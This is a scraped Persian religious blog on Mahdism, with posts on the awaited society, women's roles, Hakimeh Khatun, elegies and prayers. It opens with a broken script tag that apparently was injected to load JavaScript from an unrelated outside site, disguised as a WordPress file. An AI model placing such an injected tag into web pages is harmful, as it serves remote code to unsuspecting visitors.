script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> در سوگ سپیده
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند
دو شنبه 4 ارديبهشت 1391برچسب:در سوگ سپیده,در سوگ سپیده,در سوگ سپیده,, :: 22:35 ::  نويسنده : زارعی

در سوگ سپیده

نخستین ستاره ای بودی که در عرش به خورشید نبوت رسیدی؛ ستاره ای نیلی به رنگ جراحت آسمان و زخم زمان. ای ام ابیها! ای مهربان ترین مادر، حبیبه ی حق و شفیعه ی حشر! پدر و مادرم فدای پینه ی دست هایت باد. تو محور آسیای ایثاری و اولین علت خلقت. ای مادر رسالت و همتای ولایت! به روزهایی می اندیشیم که پس از واقعه ی عظیم غدیر، همراه با حسنین به خانه های اهل مدینه می رفتی و با بیان وحیانی خویش حجت الهی را بر غافلان، تمام می کردی و بدین سان از آغاز، حمایت از ولایت، سرلوحه ی خصایل آسمانی ات بود.



ادامه مطلب ...

تولّد دوباره‏ى يك ملّت

 

انقلاب مبارك اسلامي ايران، آذرخشي در شبستان سرد و ديجور قرن، و چراغي فرا راه انسان معاصر در متن گمراهي‏ها و پلشتي‏ها بود . انقلاب ما، دستاورد و آرزوي همه‏ي انبيا و اوليا از آدم تا خاتم بود . 

 



ادامه مطلب ...

وظايف و بايسته‌هاي يك منتظر (با رويكردي عاشورايي)

شجاعت

يكي از معيارهاي انسان منتظر، شجاعت و جسارت او در دفاع از حق است. نهال نوپاي اسلام، باشجاعت بي‌نظير پيامبر اكرم صلي الله عليه و آله و اميرمؤمنان علي عليه السلام غرس ‌شد و سپس به وسيله ائمه اطهار عليهم السلام آبياري گشت و شكوفا شد. در زمان امام سوم شيعيان حسين عليه السلام اين نهال زنده شد و در برابر گسيل لشكرها چون كوه برجاي خود ايستاد و سستي بر او چيره نشد



ادامه مطلب ...

ياران امام حسين عليه السلام الگوي ياران امام مهدي عجل الله تعالي فرجه الشريف

يکي از نيازهاي اساسي منتظران در عصر غيبت، لزوم برخورداري از الگوهاي عملي، در مسير خودسازي و نيز همراهي و مساعدت امام معصوم است، کساني که توانسته باشند در عرصه عمل، براي تحقق اهداف و آرمان‌هاي امام خود، جان فشاني کنند و نمونه‌هاي روشني در طريق اطاعت و سرسپردگي باشند و به راستي، چه کساني شايسته‌تر از ياران امام حسين عليه السلام؟!



ادامه مطلب ...

امام حسین (ع) : اگر دین ندارید آزاده باشید...

عاشورا - ماه محرم

السلام ای وادی کرببلا

السلام ای سرزمین پر بلا

السلام ای جلوه گاه ذوالمنن

السلام ای کشته های بی کفن

گويند كه در روز قيامت علمدار شفاعت زهراست . . . علم فاطمه دست قلم عباس است.

 

اصول حاکم بر نظام خانواده مهدوي

در شمارة قبل گفتيم که خانواده کوچک‌ترين نهاد اجتماعي است که نقش بالنده و اساسي در تکوين جامعه دارد. خانواده زمينه ساختارهاي هويتي و عاطفي جامعه فردا را مهيا مي‌نمايد. خانواده با التزام عملي به اصول اعتقادي خويش زمينه‌ساز جامعه کلان فردا است که بايد روابط اجتماعي، عاطفي، سياسي ـ فرهنگي آن در جهت ارزش‌هاي بايسته نظام گيرد.

و همچنين نقش آن را در جامعه پذيري افراد، بررسي  و تفاوت جامعه امروز را با جامعه گذشته بيان کرديم ؛دراين شماره اصول ديگر خانواده مهدوي را بيان خواهيم کرد.

 

 



ادامه مطلب ...

خانواده مهدوي

خانواده کوچک‌ترين نهاد اجتماعي است که نقش بالنده و اساسي در تکوين جامعه دارد. خانواده زمينه ساختارهاي هويتي و عاطفي جامعه فردا را مهيا مي‌نمايد. و با التزام عملي به اصول اعتقادي خويش زمينه‌ساز جامعه کلان فردا است که بايد روابط اجتماعي، عاطفي، سياسي ـ فرهنگي آن در جهت ارزش‌هاي بايسته نظام گيرد.

 

 



ادامه مطلب ...

شناخت دين بر دو  پايه استوار است. عقل و نقل

عقل؛ عقل بشر محدود است و كليات را درك مي‌كند و پاسخگوي بسياري از سؤال‌هاي انسان نيست. به عنوان مثال: عقل به ما مي‌گويد به صورتي بايد از نعمت دهنده تشكر كرد ولي چگونگي اين شكر گذاري را بيان نمي كند.
نقل؛ نقل از قرآن و سنت تشكيل شده است. قرآن مانند قانون اساسي است و بيان امور جزيي را به سنت واگذار كرده است. مثال: در قرآن وجوب نماز و اينكه نماز انسان را از بدي و زشتي‌ها باز مي‌دارد، آمده است[1] ولي چگونه انجام دادن و تعداد ركعت‌هاي آن را سنت و احاديث پيشوايان معصوم بيان مي‌كند.

 



ادامه مطلب ...

میلاد با سعادت آقا امام هادی النقی(ع)

 

http://farzadb.persiangig.com/21124712882146206127105722239781941855214.jpg

عطر گل های بهشتی، مشام محله را پر کرده است و اشتیاق زیارت، به نگاه ها التهاب بخشیده و فرشتگان، بشارت این مولود را به سراسر گیتی می رسانند.



 

ای گوهر بحر آفرینش/ وی چشم و چراغ اهل بینش
همنام علی مرتضایی/ سرتا به قدم خدانمائی
امروز که دل قرین شادیست/ میلاد تو ای امام هادی است
میلاد تو برهمه مبارک/ بر مهدی فاطمه مبارک

 

تربيت جامعه منتظر (قسمت پنجم و پاياني)

مقدمه

در قسمت‌هاي قبل درباره انتظار و ويژگي‌هاي جامعه منتظر بحث شد و بيان شد كه اين ويژگي‌ها جامعه را در زمينه‌هاي فكري و ظرفيت روحي و طرح‌ريزي آماده مي‌كند. همچنين بحث رهبري و مديريت و شاخص‌هاي آن مورد اشاره قرار گرفت و اينك ادامه بحث:

 



ادامه مطلب ...

 

 

 

 
عید قربان كه پس از وقوف در عرفات و مشعر و منا فرا مى رسد، عید رهایى از تعلقات است. رهایى از هر آنچه غیرخدایى است. در این روز، اسماعیل وجود را، یعنى هر آنچه بدان دلبستگى دنیوى پیدا كردیم قربانى کنیم تا سبكبال شویم.

عید سعید قربان، جشن تقرب عاشقان حق، روز اوج بندگی و تجلی ایثار ابراهیمی ،
پر شکوهترین ایثار و زیباترین جلوه ی تعبد در برابر خالق یکتا بر شما مبارک.

 

 

الحمدلله الذی لیس لقضائه دافع

دل در جوشش ناب عرفه، وضو می گیرد و در صحرای تفتیده عرفات، جاری می شود. آن جا که ایوان هزار نقش خداشناسی است. لب ها ترنم با طراوت دعا به خود گرفته و چشم ها امان خود را از بارش توبه، از دست داده اند. دل، بیقرار روح عرفات، حضرت اباعبدالله الحسین (ع) شده است. پنجره باران خورده چشم ها از ضریح اجابت، تصویر می دهد و این صحرای عرفات است که با کلمات روحبخش دعای امام حسین (ع) و اشک عاشقان او بر دامن خود اجابت را نقش می کند. اشک و زمزمه ما را نیز بپذیر، ای خدای عرفه.
- خدایا! آن‌گاه که جان ها و اندیشه ها از نسیم فرح‌بخش نام و یادت سرشار است، بگذار در برکه عرفه، خود را از زنگار غفلت و معصیت شست‌وشو دهیم.
- پروردگارا ! دلهای شکسته و بیقرار عالم را  در این روز عزیز ،روز عرفه به قرارشان برسان و لذت وعده های خویش را برایشان ارزانی بدار. آمین یا رب العالمین

 
روز عرفه، بر عارفان حق، آنان که از خیمه وجود خویش بیرون می آیند و با آتش شوق و اشتیاق وصال، به دعا و نیایش متوسل می شوند، خجسته باد

 

تربيت جامعه منتظر (قسمت چهارم)

در قسمت هاي پيشين به بيان لزوم تبيين هدف و شناخت جايگاه و شأن انسان منتظر پرداخته و اينك به رهبري و مديريت در تربيت جامعه منتظر مي‌پردازيم.
رهبري و مديريت
تمامي هستي، سازماني بزرگ است و خداوند، مدير و پروردگار اين سازمان به شمار مي‌رود. در تقسيم‌بندي‌اي، پديده‌هاي هستي را در دو قسم مي‌يابيم:

 

 

02~12.JPG



ادامه مطلب ...

شهادت امام محمد باقر(ع)

 

 

زمین و آسمان ای شیعه در حزن و غم است امشب

همه اوضاع عالم زین مصیبت در هم است امشب

امام پنجمین شد کشته از زهر هشام دون

مدینه غم سرا از این غم و زین ماتم است امشب

التماس دعا

سه شنبه 10 آبان 1390برچسب:, :: 10:22 ::  نويسنده : زارعی

تربيت جامعه منتظر (قسمت سوم)

طرح‌ريزي

ارزش انسان در جريان فکري روشن مي‌شود، توانايي و قدرت و مقاومت او با ظرفيت روحي‌اش بالا مي‌رود و به همتي دست مي‌يابد که با آن حرکت مي‌کند و با چيزهايي روبه‌رو مي‌شود و آمادگي مي‌يابد.



ادامه مطلب ...

تربيت جامعه منتظر(قسمت دوم)

انتظار

با دگرگون شدن بينش انسان از خود و ارتباطش با جهان و جامعه به آن‌چه دارد، دل‌خوش نخواهد بود و در انتظار چيز ديگري است.
انساني که شرايط خود را دانست و ارتباط گسترده و پيچيدة خود را با هستي نظام‌مند و جامعة مرتبط فهميد به آگاهي نياز دارد.



ادامه مطلب ...

سالروز ازدواج آسمانی حضرت امیرالمومنین(ع) و خانم فاطمه زهرا(س)

لباس یاس برتن کرد زهرا      کنار دست او بنشست مولا

محمدخطبه خواند زهرا بلی گفت       غلط گفتم بلی نه “یاعلی” گفت

..........................

سالروز ازدواج پر ز نور آقا امیر المومنین حضرت علی (علیه السلام) و خانم

حضرت فاطمه (سلام الله علیها) بر تمامی محبین آل الله تبریک و تهنیت باد.

 

تربيت جامعه منتظر(قسمت اول)

نهاد «جامعه منتظر» را به خوبي مي‌توان با نگاه به آموزه‌هاي نبوي و علوي رصد نمود و درباره گستره و غناي آن به انديشه و خردورزي پرداخت. پيامبر اکرم صل الله عليه و آله همواره از آغاز جامعه اسلامي، کام امت را با انتظار مي‌گشود و آنان را به فراسوي چشم‌اندازنگري، برنامه محوري و تلاش‌گري ره‌ مي‌نمود و جان آنان را با نسيم کلام خويش اين‌گونه آشنا مي‌ساخت: «افضل اعمال امتي انتظار الفرج. »



ادامه مطلب ...

 

زندگاني حکيمه خاتون - نکات

نكات
از اين روايات نكاتي چند استفاده مي‌شود:
1. دعاي حكيمه خاتون و مستجاب شدن دعاي وي براي روزي شدن فرزند به امام عليه السلام حاكي از معرفت اين بانوي فرزانه و علاقه مندي و ارادت به ولايت وي است.
2. نهايت تواضع حكيمه خاتون نسبت به نرجس خاتون (و بالعكس) و اصرار حكيمه خاتون در خدمت رساني به وي.
3. دعاي امام عسكري عليه السلام براي حكيمه خاتون ـ خدا به تو جزاي خير دهد ـ اين دعا از آن چه خورشيد بر آن بتابد برتر است و نشانة آن است كه عمل حكيمه خاتون، موردپسند و رضايت ايشان بوده است.



ادامه مطلب ...

زندگاني حکيمه خاتون - دوران امامت امام جواد علیه السلام

دوران امامت امام جواد عليه السلام
امامان بزرگوار در عصر خود فعاليت‌هاي گوناگوني به تناسب زمان خود داشته ودر مکتب خود شاگرداني در جهات مختلف تربيت مي‌کردند.آنان علوم و دانش اجتماعي وسياسي خود را با توجه به فشارهاي گونا گون حکومتي به صورت‌هاي مختلف در جامعه منتشر مي‌کردند. در زمان امام باقر و امام صادق عليهما السلام، از آن‌جا که شرايط اجتماعي و سياسي تا حدودي مساعد بود توانستند چندين هزار شاگرد تربيت کنند، ولي از دورة امام جواد تا امام عسكري عليهم السلام به دليل فشار‌هاي سياسي وکنترل شديد حکومت، شعا ع فعاليت آنان بسيار محدود بود.از اين رو تعداد راويان و پرورش يافتگان مکتب آنان نسبت به زمان حضرت صادق عليه السلام کاهش چشمگيري را نشان مي‌دهد.



ادامه مطلب ...

زندگاني حکيمه خاتون

حكيمه خاتون يكي از بانوان بزرگ عالم اسلام و تشيع است كه در يكي از برهه‌هاي حساس تاريخ، يعني در آستانه ميلاد حضرت مهدي عجل الله تعالي فرجه الشريف مي‌زيسته است و پرستاري و آموزش مادر ولي عصر عجل الله تعالي فرجه الشريف را عهده دار بوده است.
ايشان جزء اولين كساني است كه حضرت مهدي عجل الله تعالي فرجه الشريف را ديده است و راوي حديث ازدواج پدران‌شان و تولد و رشد آن حضرت مي‌باشد.مقاله حاضر كه در پي تبيين زندگي و نقش حساس حضرت حكيمه خاتون در دوره‌هاي امامت چهار امام همام مي‌باشد. با مراجعه به متون اوليه، سعي در ارائة تحليلي روشن پيرامون وقايع زندگي آن بانوي بزرگ دارد و در آخر به بيان شبهاتي چند و پاسخ آنها خواهيم پرداخت.



ادامه مطلب ...

نقش زن در زمينه سازي ظهور - زمينه‌سازي زنان در خانواده

4. زمينه‌سازي زنان در خانواده
زن به منزله محور اساسي خانواده كه بنيان‌گذار رحم و قرابت است شالودة خانواده را بنيان‌ مي‌گذارد و تأثيرات روحي و رواني زن را نمي‌توان در خانواده از نظر دور داشت.
تأثير زن را در خانواده مي‌توان از جنبه‌هاي مختلف و به صورت مشهود، در نقش مادر و همسر در نظر گرفت. با توجه به اهميت اين دو نقش اساسي كه در قرآن نيز بدان اشاره شده است به بررسي نقش زنان در زمينه‌سازي ظهور مي‌پردازيم.



ادامه مطلب ...

نقش زن در زمينه سازي ظهور

همه انسان‌ها در برابر امام عصرِ خود مسئول هستند و براي زمينه‌سازي ظهور آن حضرت وظايفي را بر عهده دارند. زنان علاوه بر نقش عمومي كه همة انسان‌ها عهده‌دار هستند، مي‌توانند در مواردي به طور خاص ايفاي نقش نموده و زمينه‌هاي ظهور را فراهم نمايند و اين مسئله، اهميت نقش زنان را در زمينه‌سازي ظهور روشن مي‌نمايد.
براي دست‌يابي به اين مهم، شناخت جايگاه زن در ابعاد مختلف لازم است تا بتوان در پرتو آن به چگونگي تأثيرگذاري زن در ابعاد گوناگون پرداخت.در اين نوشتار براي پاسخ‌گويي به كيفيت نقش زنان در زمينه‌سازي ظهور، ضمن استفاده از كتاب‌هاي روايي و تحليلي، براي استفادة بهتر از نظرات موجود، با مراجعه به سايت‌هاي اينترنتي مرتبط با مهدويت و جست‌وجو در مقالات، فصلنامه‌ها و ... سعي شده است تا ارائه مطالب به صورت توصيفي ـ تحليلي از پويايي هر چه بيشتر برخوردار گردد.



ادامه مطلب ...
چهار شنبه 20 مهر 1390برچسب:رجعت زنان,رجعت زنان,رجعت زنان,, :: 10:55 ::  نويسنده : زارعی

رجعت زنان

چكيده
از باورهاي ويژة شيعيان، اعتقاد به رجعت و حيات مجدد افراد و گروه‌هاي خاص در پايان تاريخ و ظهور امام زمان عجل الله تعالي فرجه الشريف است. رجعت، باوري است كه مخالفان، با پرسش‌ها و شبهه‌ها فراواني درصدد مخدوش جلوه دادن آن بر آمده‌اند؛ از اين رو براي اثبات و تقويت باورداشت رجعت و نيز براي پاسخ‌گويي به شبهه‌ها و سؤالات مخالفان، پژوهش دربارة رجعت ضروري است.
از سوي ديگر، براي جامعه زنان كه نيمي از جمعيت انساني را تشكيل مي‌دهند نيز پرسش‌هايي مطرح است از جمله اين كه آيا زنان در رجعت، هنگام قيام امام زمان عجل الله تعالي فرجه الشريف و تشكيل حكومت جهاني مهدوي، مشاركت دارند؟ اين نوشتار درصدد پاسخ‌گويي به سؤالهاي فوق، با تمركز بر نقش زنان مي‌باشد:



ادامه مطلب ...

 

مسئوليّت‌هاي زنان در جامعه منتظر - جامعه منتظر

 در دعاي منسوب به امام رضا عليه السلام به اين مطلب اشاره شده است:
و ما را از كساني قرار ده كه دين خود را به وسيلة آنها غلبه مي‌دهي و به سبب ايشان ياري ولي خود را عزّت مي‌بخشي و غير ما را «در اين مقام» جاي گزين ما قرار مده كه همانا جاي گزين كردن غير ما به جاي ما بر تو آسان است، ولي بر ما سخت (ناگوار) مي‌باشد.[15]
كساني كه به نحوي در مسير تربيت منتظران راستين امام عصر عجل الله تعالي فرجه الشريف قدم برمي دارند، اگر با نيت خالص و براي جلب رضاي الهي، عمل كنند، جزء تقويت كنندگان سلطة ايشان قرار مي‌گيرند و در قيامت در زمرة ايشان محشور مي‌شوند.

 



ادامه مطلب ...

مسئوليّت‌هاي زنان در جامعه منتظر

چكيده
در عصر غيبت كه دوره پنهان زيستي امام زمان عجل الله تعالي فرجه الشريف است، معتقدان به مهدويت براي زمينه سازي و نيل به جامعه موعود جهاني، داراي رسالت‌ها و مسئوليت‌هاي خطيري هستند كه با پاي بندي و اجراي آنها مي‌توانند زمينه‌ساز ظهور آن حضرت باشند.
در اين ميان، نقش زنان كه پنجاه درصد جمعيت بشر را به خود اختصاص داده‌اند، نقشي مهم و تأثيرگذار است، زيرا زنان منتظر، علاوه بر اين كه نسبت به خويشتن مسئوليت دارند و بايد خود را جزء منتظران واقعي قرار دهند، هم چنين بايد به ديگرسازي، يعني تربيت و تعالي نسل منتظر نيز همت گمارند.



ادامه مطلب ...

نامه اي به امام : مولا جان يگانه محبوبم

 

تابه كي از وجود مقدستان محروم باشيم و تا كي روزها را در انتظار تان بگذرانيم و از ديدار شما اي قطب عالم امكان بي نصيب باشيم .

مولا جان روزها را مي گذرانيم بي آنكه ازشما خبري داشته باشيم هفته ها را سپري مي كنيم بي آنكه شما را ديده باشيم شبهاي جمعه كه مي رسد اشتياق ديدارتان را مي كشيم كه شايد اين شب در سحرگاه صداي نازنين و دلرباي شما رابشنويم و جان دوباره بگيريم .





ادامه مطلب ...
شنبه 9 مهر 1390برچسب:غروب جمعه,غروب جمعه,غروب جمعه,, :: 11:4 ::  نويسنده : زارعی

 

 تصاوير زيباسازی وبلاگ ، عروسك ياهو ، متحرك             www.bahar22.com

غروب جمعه  
غروب جمعه دلم بوی یار می گیرد
افق افق دل من  را غبار می گیرد
نه با زیارت یاسین دلم شود آرام
نه با دعای سماتم قرار می گیرد
نوای ندبه صبحم هنوز ورد لب است
که نغمه عشراتم به بار می گیرد
دل صنوبریم زین هوای مه آلود
نه از فراق که از انتظار می گیرد
قسم به عصر که خسران قرین انسان است
مگر هر آنکه دانش خود را به کار می گیرد
بدان که دلبر ما جان برای یاری خویش
در این دیار هزاران هزار می گیرد
به گوش منتظران گو که صبح نزدیک است
اگر چه شب ز رفیقان دمار می گیرد
جمال یار چو خورشید عالم افروز است
حجاب نفس تو را زان نگار می گیرد
تمام دلخوشیم یک نگاه کوچک اوست
ز چیست یار من از من کنار می گیرد
اگر که یار نخواهد به جلوه غم ببرد
دل زهیر چو شبهای تار می گیرد

 

   

 

 

 

 


پيام‌هاي مهدوي به زن مسلمان - صله رحم

 

19. صله رحم

دربارة حضرت مهدي عجل الله تعالي فرجه الشريف از امام علي عليه السلام نقل شده که از همه بيشتر صله رحم مي‌کند؛ آن جا که فرمود: « او از همه بيشتر صله رحم خواهد کرد[26] ». زن مسلمان نيز با الگوگيري از حضرت مهدي عجل الله تعالي فرجه الشريف بايد اين سنت مهدوي، بلكه سنت همة امامان و انبيا را احيا كند.



ادامه مطلب ...

پيام‌هاي مهدوي به زن مسلمان

چكيده
امام زمان عجل الله تعالي فرجه الشريف آن گونه كه از قرآن و روايات نبوي و اهل بيت عليهم السلام استفاده مي‌شود داراي اهداف و آرمان‌هاي بسيار بلندي است كه قرار است در عصر ظهور آنها را در سطح جهان پياده نمايد،آرمان هايي كه فقط با امدادهاي غيبي و به توسط مردي الهي هم‌چون او قابل پياده شدن است. ولي اين به آن معنا نيست كه در عصر غيبت هيچ مرتبة از آن آرمان‌ها قابل پياده شدن نيست، ما مي‌توانيم در سطوح مختلف جامعه و در قشرهاي مختلف جلوه هايي از آنها را با الگو گرفتن از حضرت مهدي عجل الله تعالي فرجه الشريف و يارانش پياده كنيم تا زمينه‌ساز ظهور او گرديم. يك قشر مهم از اقشار جامعه بانوان هستند كه مي‌توانند با الگو گرفتن از آرمان‌هاي بلند مهدوي، جامعه اي مهدوي در حد خود و در عصر غيبت پياده كنند، و اين با برداشت پيام هايي است كه از فرهنگ مهدويت به دست مي‌آيد، موضوعي كه ما در اين مقاله در حدّ وسع و توان‌مان به آن مي‌پردازيم.



ادامه مطلب ...

زن منتظر و منتظر‌پروري

چكيده
 

آن‌چه اين نوشتار در پي آن است، تبيين نقش مادر در تربيت نسل ولايي با بهره گيري از آداب و دستورات وارد شده در مضامين ديني است. براي تبيين اين مسئله، نويسنده به ساز و كارهاي تربيت نسل مهدوي و ضرورت بهره‌گيري از اين ساز و كارها پرداخته است.
در اين مقاله، نگارنده به هشت گام اساسي اشاره مي‌كند كه مادران بايد بردارند تا محصول تربيت آنان، تربيت نسلي مهدي‌باور و مهدي‌ياور باشد. اين گام‌ها عمدتاً از زمان انتخاب همسر آغاز و نهايتاً تا پايان دوره نوجواني ادامه مي‌يابد. نگارنده، در اين نوشتار در پي اثبات اين مهم است كه غفلت از آداب اسلامي و دستورات وارده در اين زمينه، موجب ناكامي خانواده‌ها در تربيت نسل ولايت‌مدار در عصر حاضر شده است.



ادامه مطلب ...

زن و جامعه مهدوي؛وظايف و مسئوليّت‌ها - زنان در جامعه فعلی

بحث ديگري كه زنان در جامعة فعلي،‌ بايد به عنوان يك وظيفه انجام بدهند، افزايش خردورزي و خردمندي زنان است؛ همان‌طور كه حضرت علي عليه السلام فرمودند، در عرصه عقل، زنان از نوعي نقصان عقلي به سبب غلبه عواطف برخوردارند كه بايد اين نقصان جبران گردد و به كمال عقلي برسند. آن‌جايي كه مسئله مشورت زنان با حضرت مطرح مي‌‌شود، حضرت علي عليه السلام مي‌گويند:‌ «با زنان مشورت نكنيد مگر اين‌كه مطمئن باشيد كه اينها به آن كمال عقلاني رسيده‌اند»، فكر مي‌كنم زنان بايد به هر حال در ارتباط با افزايش خردمندي و آن تكامل عقلاني خودشان بيشتر كار كنند؛ مخصوصاً در عرصه فعلي كه براي تثبيت دين‌داري و دين‌مداري و انجام رسالت ديني، مسئله عقلانيت از جايگاه مهمي برخوردار است. مسئله ديگر، فهم تحول جهاني است؛



ادامه مطلب ...

زن و جامعه مهدوي؛وظايف و مسئوليّت‌ها - زن و جامعه مهدوی-ادامه1

در صورت پذيرفته شدن اين سخن، بايستي به شناسايي لوازم اين حضور پرداخت: مهم‌ترين لازمه اين حضور، داشتن تقواست. در آيات و روايات اشاره مي‌شود که ملاک برتري و ملاک امتياز افراد در جامعه، داشتن تقوا ست. اما مهم است توجه داشته باشيم كه تقوا يعني چه و به چه كساني با تقوا گفته مي‌شود؟ آن چه از منابع ديني استنباط مي‌شود، آن عهد و ميثاقي که در بدو خلقت از انسان گرفته شده است، كه آن عبارت است از عبوديت و پذيرش عبوديت الهي و از طرفي مجراي اين عبادت و ولايت الهي هم تولي داشتن به ولايت اولياي الهي معرفي شده است. اولياي محوري، ائمه معصومين عليه السلام هستند و در رأس آنها وجود مقدس نبي اکرم صل الله عليه و آله و سلم است. در حقيقت، باطن دين و دين داري، تولي به ولي الله است و براساس ميزان تولي که افراد به ولي الهي دارند مي‌شود آنها را ارزش گزاري کرد؛ پس هر چه ميزان تولي بالا مي‌رود درجه تقوا هم بالاتر مي‌رود. در عصر غيبت به سر مي‌بريم. امام عصر حاضر نيستند و طبيعتاً ميزان تولي به نايب ايشان، ولي عصر عجل الله تعالي فرجه الشريف مي‌تواند ميزان معبوديت باشد.




ادامه مطلب ...

زن و جامعه مهدوي؛وظايف و مسئوليّت‌ها

به دنبال برگزاري ميزگردهاي علمي با حضور کارشناسان مباحث مهدويت، در اين شماره به بررسي موضوع زن و مهدويت پرداخته ايم. عمده سوالاتي که در اين زمينه مطرح است، عبارتند از:
1. وجوه ارتباط مباحث مهدويت با زنان در كدام عرصه‌ها ممكن و قابل طرح است؟
2. وجوه تمايز و تشابه نقش زنان در عرصه مباحث مهدويت با مردان در جامعه امروز چيست؟ 3. وظايف خاص زنان در باب مباحث مهدويت در شرايط كنوني كدام است؟
4. زنان جامعه اسلامي براي ايفاي بهينه وظايف و مسئوليت‌هاي خود مي‌بايست داراي چه صفات و ويژگي‌هايي باشند؟
5. مهم‌ترين وظايف تربيتي زنان به عنوان مادر در ترويج فرهنگ مهدوي چيست؟
6. مهم‌ترين وظايف زنان جامعه اسلامي امروز به عنوان يك همسر در جامعه مهدوي امروز چيست؟
7. مهم‌ترين وظايف زنان به عنوان يك عضو جامعه مهدوي چيست؟
8. ايفاي وظايف مربوط به مهدويت چه تأثيرات و كاركردهايي را براي زن امروز به همراه دارد؟
9. مباحث مهدويت چگونه مي‌تواند چالش‌ها و ضعف‌هاي جريانات فكري موجود در فمنيسم رايج را پاسخ دهد؟
10. راهكارهاي بهينه سازي ايفاي نقش و وظايف زنان در جامعه مهدوي امروزي چيست؟




ادامه مطلب ...
دو شنبه 28 شهريور 1390برچسب:انتظار فرج ,انتظار فرج ,, :: 7:43 ::  نويسنده : زارعی

انتظار فرج

يكي از شرايط حضوردر حكومت بقية الله و توفيق ديدار با آن حضرت، انتظار فرج است؛ يعني آمادگي كامل مبارزه با افكار انحرافي و فساد اخلاقي و در يك كلام انتظار فرج يعني بيزاري از دشمنان خدا و پيامبر (صل الله علیه و آله و سلم) و معصومين(علیه السلام) . بي‌سبب نيست كه انتظار از بهترين اعمال شمرده شده است، بلكه فرد منتظِر دولت مهدي همانند كسي است كه در پيش روي رسول خدا (صل الله علیهشهيد گش و آله و سلم) ته و در خون خود غلتيده است و اگر بر همان حالت انتظار از دنيا برود، بسان كسي است كه در خيمه مهدي فاطمه  (علیه السلام) مي‌باشد.



ادامه مطلب ...
شنبه 26 شهريور 1390برچسب:زنان سرافراز,زنان سرافراز,, :: 7:24 ::  نويسنده : زارعی

زنان سرافراز

اينك به اختصار به شرح حال برخي زنان نام‌برده مي‌پردازيم.
1. صيانه ماشطه
او يكي از همان سيزده بانويي است كه در دولت حضرت مهدي  (علیه السلام)  زنده شده، به دنيا باز مي‌گردد. وي همسر حزقيل - پسر عموي فرعون- و شغلش آرايشگري دختر فرعون بود. او همانند شوهرش به پيامبر زمان خود - حضرت موسي- ايمان آورده بود، ولي همچنان ايمان خود را پنهان مي‌كرد. نوشته‌اند: روزي وي مشغول آرايش دختر فرعون بود كه شانه از دستش افتاد و بي اختيار نام خدا را بر زبان جاري ساخت. دختر فرعون گفت: آيا نام پدر مرا بر زبان آوردي؟ گفت: نه، بلكه نام كسي را بر زبان آوردم كه پدر تو را آفريده است.



ادامه مطلب ...

نقش زنان در حكومت امام زمان (علیه السلام)

سزاوار است بدانيم زنان در حكومت قائم آل محمد (علیه السلام) چه مي‌كنند، چه كساني هستند، چند نفرند، از كجا مي‌آيند و چه مسئوليتي بر عهده دارند. بر اساس برخي روايات، حضور و نقش اين زنان از نظر زمان و موقعيت،چهار گونه است:

الف- حضور پنجاه زن در بين ياران امام (علیه السلام)
اولين گروه از زناني كه به محضر امام زمان مي‌شتابند، آنهايند كه در آن ايام مي‌زيسته‌اند و همانند ديگر ياران امام (علیه السلام) به هنگام ظهور در حرم امن الهي به خدمت امام (علیه السلام) مي‌رسند. در اين باره دو روايت وجود دارد: روايت اول: امّ سلمه ضمن حديثي درباره علايم ظهور، از پيامبر (صل الله علیه و آله و سلم) روايت كرده است كه فرمود: «يعوذ عائذ من الحرم  فيجتمع الناس اليه كالطير الوارده المتفرقه حتي يجتمع اليه ثلاث مأة و اربعة عشر رجلاً فيه نسوة فيظهر علي كل جبار و ابن جبار... ؛  در آن هنگام پناهنده‌اي به حرم امن الهي پناه مي‌آورد و مردم همانند كبوتراني كه از چهار سو به يك جهت هجوم مي‌برند، به سوي او جمع مي‌شوند تا اين‌كه در نزد آن حضرت سيصد و چهارده نفر گرد مي‌آيند كه برخي از آنان زن مي‌باشند، و بر هر جبار و جبار‌زاده‌اي پيروز مي‌شود.



ادامه مطلب ...

زنان نمونه یاوران امام زمان (عج)

مقدمه

آفرينشِ زن، برگ زريني از کتاب خلقت است. زيرا زن يکي از مظاهرِ زيبايي و بزرگي خداوند است. زنان! نيمي از اجتماع را تشکيل مي دهند و نقش مهمي در رشد و پيشرفت جامعه دارند.
در نظام خلقت همانطور که دين اسلام اشاره کرده، خداوند زن و مرد را جداگانه خلق نمود و از روح خود بر آنها دميد.
زرارة‌ بن اعين از امام صادق عليه السلام نقل مي­کند که:
« خداوند بعد از آفرينش آدم، حوا را به طور نو ظهور پديد آورد...».[1]



ادامه مطلب ...

حکومت شايستگان از نگاه قرآن

اميد به حاکميت "انسان‌هاي صالح" در آينده­اي روشن و استقرار عدالت و صلح فراگير و همگاني، امري فطري است. همة افراد، براساس فطرت ذاتي خود، به اميد روزي هستند که جهان در پرتو هدايت‌هاي انساني شايسته و با تأييد و عنايت پروردگار هستي، از بيداد و تباهي رهايي يافته، از نا بساماني­ها، ناامني‌ها و تيره‌روزي­ها خلاص شود و سرانجام به صلح و صلاح نايل آيد.



ادامه مطلب ...
چهار شنبه 23 شهريور 1390برچسب:شبی چون صبح نورانی,شبی چون صبح نورانی, :: 7:44 ::  نويسنده : زارعی

شبي چون صبح نوراني

 

شب قدر است و طي شد نامة هجر
آن شب كه بايد شكوائية هجران را در نورديد و به اميد وصل ديدار بيدار نشست و از جام طهور ((سلام)) تا ((مطلع فجر))، سرمست بود، كدام شب است؟آن شب كه شاعر حافظ قرآن، با الهام گرفتن از قرآن، آن را ((شب وصل)) مي‌نامد و نامة هجران را در آن شب، طي‌شده و پايان ـ يافته مي‌خواند، كدام شب نوراني و دل‌افروز است؟



ادامه مطلب ...

صفحه قبل 1 2 3 4 5 صفحه بعد

درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 1
بازدید دیروز : 7
بازدید هفته : 43
بازدید ماه : 93
بازدید کل : 32862
